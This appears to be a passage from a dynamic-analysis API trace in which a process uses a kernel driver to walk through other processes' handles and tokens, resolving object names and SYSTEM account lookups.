returned 0x0 [0135.603] ObfDereferenceObject (Object=0xfffff8a001942af0) returned 0x1 [0135.603] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.603] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.603] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.603] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.603] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.603] PsAcquireProcessExitSynchronization () returned 0x0 [0135.603] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.603] ObReferenceObjectByHandle (in: Handle=0x770, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00195c700, HandleInformation=0x0) returned 0x0 [0135.603] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.603] PsReleaseProcessExitSynchronization () returned 0x2 [0135.603] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.603] ObQueryNameString (in: Object=0xfffff8a00195c700, ObjectNameInfo=0xfffffa8002923044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002923044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.603] ObfDereferenceObject (Object=0xfffff8a00195c700) returned 0x1 [0135.603] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.603] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.603] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.604] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.604] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.604] PsAcquireProcessExitSynchronization () returned 0x0 [0135.604] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.604] ObReferenceObjectByHandle (in: Handle=0x774, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b9c060, HandleInformation=0x0) returned 0x0 [0135.604] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.604] PsReleaseProcessExitSynchronization () returned 0x2 [0135.604] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.604] ObQueryNameString (in: Object=0xfffff8a001b9c060, ObjectNameInfo=0xfffffa8002924044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002924044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.604] ObfDereferenceObject (Object=0xfffff8a001b9c060) returned 0x1 [0135.604] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.604] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.604] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.604] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.604] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.604] PsAcquireProcessExitSynchronization () returned 0x0 [0135.605] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.605] ObReferenceObjectByHandle (in: Handle=0x780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b0ac80, HandleInformation=0x0) returned 0x0 [0135.605] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.605] PsReleaseProcessExitSynchronization () returned 0x2 [0135.605] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.605] ObQueryNameString (in: Object=0xfffff8a001b0ac80, ObjectNameInfo=0xfffffa8002925044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002925044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.605] ObfDereferenceObject (Object=0xfffff8a001b0ac80) returned 0x1 [0135.605] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.605] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.605] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.605] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.605] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.605] PsAcquireProcessExitSynchronization () returned 0x0 [0135.605] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.605] ObReferenceObjectByHandle (in: Handle=0x784, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00209faf0, HandleInformation=0x0) returned 0x0 [0135.605] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.605] PsReleaseProcessExitSynchronization () returned 0x2 [0135.606] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.606] ObQueryNameString (in: Object=0xfffff8a00209faf0, ObjectNameInfo=0xfffffa8002927044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002927044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.606] ObfDereferenceObject (Object=0xfffff8a00209faf0) returned 0x1 [0135.606] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.606] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.606] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.606] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.606] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.606] PsAcquireProcessExitSynchronization () returned 0x0 [0135.606] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.606] ObReferenceObjectByHandle (in: Handle=0x7fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001db4fc0, HandleInformation=0x0) returned 0x0 [0135.606] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.606] PsReleaseProcessExitSynchronization () returned 0x2 [0135.606] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.606] ObQueryNameString (in: Object=0xfffff8a001db4fc0, ObjectNameInfo=0xfffffa800292a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800292a044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.606] ObfDereferenceObject (Object=0xfffff8a001db4fc0) returned 0x1 [0135.607] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.607] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.607] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.607] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.607] PsAcquireProcessExitSynchronization () returned 0x0 [0135.607] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.607] ObReferenceObjectByHandle (in: Handle=0x808, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001dc1f00, HandleInformation=0x0) returned 0x0 [0135.607] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.607] PsReleaseProcessExitSynchronization () returned 0x2 [0135.607] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.607] ObQueryNameString (in: Object=0xfffff8a001dc1f00, ObjectNameInfo=0xfffffa8002947044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002947044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.607] ObfDereferenceObject (Object=0xfffff8a001dc1f00) returned 0x1 [0135.607] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.607] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.607] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.608] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.608] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.608] PsAcquireProcessExitSynchronization () returned 0x0 [0135.608] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.608] ObReferenceObjectByHandle (in: Handle=0x868, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0023ecf20, HandleInformation=0x0) returned 0x0 [0135.608] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.608] PsReleaseProcessExitSynchronization () returned 0x2 [0135.608] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.608] ObQueryNameString (in: Object=0xfffff8a0023ecf20, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.608] ObfDereferenceObject (Object=0xfffff8a0023ecf20) returned 0x1 [0135.608] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.608] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.608] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.608] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.608] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.608] PsAcquireProcessExitSynchronization () returned 0x0 [0135.608] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.609] ObReferenceObjectByHandle (in: Handle=0x878, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001da49c0, HandleInformation=0x0) returned 0x0 [0135.609] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.609] PsReleaseProcessExitSynchronization () returned 0x2 [0135.609] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.609] ObQueryNameString (in: Object=0xfffff8a001da49c0, ObjectNameInfo=0xfffffa80025f17c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025f17c4, ReturnLength=0xfffff88005163550) returned 0x0 [0135.609] ObfDereferenceObject (Object=0xfffff8a001da49c0) returned 0x1 [0135.609] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.609] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.609] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.609] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.609] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.609] PsAcquireProcessExitSynchronization () returned 0x0 [0135.609] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.609] ObReferenceObjectByHandle (in: Handle=0x884, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001a20fc0, HandleInformation=0x0) returned 0x0 [0135.609] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.609] PsReleaseProcessExitSynchronization () returned 0x2 [0135.609] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.609] ObQueryNameString (in: Object=0xfffff8a001a20fc0, ObjectNameInfo=0xfffffa80022b0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022b0044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.609] ObfDereferenceObject (Object=0xfffff8a001a20fc0) returned 0x1 [0135.609] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.610] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.610] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.610] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.610] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.610] PsAcquireProcessExitSynchronization () returned 0x0 [0135.610] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.610] ObReferenceObjectByHandle (in: Handle=0x89c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0028f2850, HandleInformation=0x0) returned 0x0 [0135.610] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.610] PsReleaseProcessExitSynchronization () returned 0x2 [0135.610] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.610] ObQueryNameString (in: Object=0xfffff8a0028f2850, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.610] ObfDereferenceObject (Object=0xfffff8a0028f2850) returned 0x1 [0135.610] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.610] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.610] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.610] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.610] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.610] PsAcquireProcessExitSynchronization () returned 0x0 [0135.611] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.611] ObReferenceObjectByHandle (in: Handle=0x8d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0028b69f0, HandleInformation=0x0) returned 0x0 [0135.611] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.611] PsReleaseProcessExitSynchronization () returned 0x2 [0135.611] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.611] ObQueryNameString (in: Object=0xfffff8a0028b69f0, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.611] ObfDereferenceObject (Object=0xfffff8a0028b69f0) returned 0x1 [0135.611] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.611] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0xc8 [0135.611] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0135.611] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800bafe630, HandleInformation=0x0) returned 0x0 [0135.611] ObOpenObjectByPointer (in: Object=0xfffffa800bafe630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000868) returned 0x0 [0135.611] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6e [0135.611] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000868, DesiredAccess=0x8, TokenHandle=0xfffffa800219ab80 | out: TokenHandle=0xfffffa800219ab80*=0xc4) returned 0x0 [0135.612] ZwClose (Handle=0xffffffff80000868) returned 0x0 [0135.612] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.612] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0135.612] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0136.352] CloseHandle (hObject=0xc4) returned 1 [0136.352] CloseHandle (hObject=0xc8) returned 1 [0136.353] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.353] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0136.353] PsLookupProcessByProcessId (in: ProcessId=0x1ac, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.353] PsAcquireProcessExitSynchronization () returned 0x0 [0136.353] KeStackAttachProcess (in: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880051635d0) [0136.353] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003577a80, HandleInformation=0x0) returned 0x0 [0136.353] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.353] PsReleaseProcessExitSynchronization () returned 0x2 [0136.353] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6c [0136.354] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ae3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ae3044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.354] ObfDereferenceObject (Object=0xfffffa8003577a80) returned 0x1 [0136.354] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.354] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.354] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.354] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.354] PsLookupProcessByProcessId (in: ProcessId=0x1ac, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.354] PsAcquireProcessExitSynchronization () returned 0x0 [0136.354] KeStackAttachProcess (in: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880051635d0) [0136.354] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038f1500, HandleInformation=0x0) returned 0x0 [0136.354] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.355] PsReleaseProcessExitSynchronization () returned 0x2 [0136.355] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6c [0136.355] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002aec044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002aec044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.355] ObfDereferenceObject (Object=0xfffffa80038f1500) returned 0x1 [0136.355] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.355] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0xc8 [0136.355] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0136.355] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003498b30, HandleInformation=0x0) returned 0x0 [0136.355] ObOpenObjectByPointer (in: Object=0xfffffa8003498b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000810) returned 0x0 [0136.355] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7c [0136.355] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000810, DesiredAccess=0x8, TokenHandle=0xfffffa800370a340 | out: TokenHandle=0xfffffa800370a340*=0xc4) returned 0x0 [0136.355] ZwClose (Handle=0xffffffff80000810) returned 0x0 [0136.356] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.356] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0136.356] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), 